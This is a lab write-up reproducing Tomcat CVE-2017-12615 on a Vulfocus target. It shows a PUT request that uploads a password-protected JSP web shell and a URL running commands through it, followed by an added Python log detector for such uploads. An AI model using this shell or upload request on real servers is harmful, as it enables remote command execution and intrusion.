[Vulfocus Vulnerability Reproduction] tomcat-cve_2017_12615

Access the target

http://123.58.236.76:15450/

Capture the request with Burp
Change the request method to PUT and add a request body, as a POST request would have

PUT /shell.jsp/ HTTP/1.1
Host: 123.58.236.76:15450
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IlUzNGxjL1NvSjdQTzRWMjd1dVNvNHc9PSIsInZhbHVlIjoiNXlRQUpFWTlYek9CTnVkSmk4bzZza05QL3JLNTI4eHJYNHlDaWpsV0lLbjJkYXJpbFJjSXZvUFZYTDQzeTdLZTg1cFc2TmV0OUY0UWVIaXlrZGEwc3dTc3gyaWxtTjJ5eVE1ZVN1TEZ3WFhSbVd1NXVVOE45SUxOQldjM3Z0QTciLCJtYWMiOiI4YzdjMjZmYWM3OGJhNTczZTMxMTUwODY5MGU3YTIzNDRiYjhhYmM5ZDNmNzNjNjFkMjgzMTgzMzVhMDRlMmZjIn0%3D; laravel_session=eyJpdiI6ImFCZS85SDczQXBwL1ZwUFJHUE0veEE9PSIsInZhbHVlIjoic082eUJBSFZrQ2NsOXRxakt6MkVLT0Y5Vk1SbnFDYlJNNkwwSWdpNGhycDN3ejYvaTE4WjBhMThlQnBUTWkwN2RSY3pXZXQwZlNXRTZsVW5OMW0yRmErZGVmeitYYktUbFA1QWhFN1hSMDZGTEJGVURhYlUxczBBbTRKY3hwWUwiLCJtYWMiOiJkYThhN2RmOGRiZjBjZjc1ZTBlNTM4MTQyZmUxOTcyMDllZDM0OTEzZDYxOWY3NzdjNmE1MzcyMTgyYjE0ZmFkIn0%3D; JSESSIONID=3D9771B252C8900C7201D5D0100C59ED
Connection: close

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

Direct remote command execution

http://123.58.236.76:15450/shell.jsp?pwd=123&cmd=ls /tmp
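
From the defender's side, the two requests above leave a recognisable pair in the Tomcat access log: a PUT answered with 201 or 204 whose path names a JSP, then a 200 response from that same JSP. The following is an added example, not part of the original post; it assumes the AccessLogValve "common" pattern, the function names are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed log format: Tomcat AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# ".jsp"/".jspx" followed by end of path or any non-alphanumeric suffix,
# which covers the trailing slash used in the PUT request above.
JSP_NAME = re.compile(r'\.jspx?(?![a-z0-9])', re.I)

def jsp_key(path):
    """Return the path cut off right after .jsp/.jspx, or None if it names no JSP."""
    m = JSP_NAME.search(path)
    return path[:m.end()].lower() if m else None

def find_jsp_uploads(lines):
    """Flag successful PUTs that write a JSP and later 200 responses from that JSP."""
    written, findings = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, method, target, status = m[1], m[2], m[3], int(m[4])
        parts = urlsplit(target)
        key = jsp_key(unquote(parts.path))
        if key is None:
            continue
        if method == "PUT" and status in (201, 204):  # 201 created, 204 overwritten
            written.add(key)
            findings.append(("jsp_written_via_put", client, parts.path))
        elif key in written and status == 200:
            findings.append(("uploaded_jsp_requested", client, target))
    return findings

# Constructed sample lines (documentation-range client addresses).
SAMPLE = [
    '203.0.113.5 - - [10/Apr/2022:10:00:01 +0800] "GET / HTTP/1.1" 200 11230',
    '203.0.113.5 - - [10/Apr/2022:10:00:09 +0800] "PUT /shell.jsp/ HTTP/1.1" 201 -',
    '203.0.113.5 - - [10/Apr/2022:10:00:15 +0800] "GET /shell.jsp?pwd=123&cmd=ls%20/tmp HTTP/1.1" 200 58',
    '198.51.100.7 - - [10/Apr/2022:10:02:00 +0800] "PUT /notes.jsp%20 HTTP/1.1" 403 -',
]

if __name__ == "__main__":
    for finding in find_jsp_uploads(SAMPLE):
        print(finding)
```

A PUT that the server rejects (the 403 line) produces no finding, so the output separates attempts from writes that actually landed on disk.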
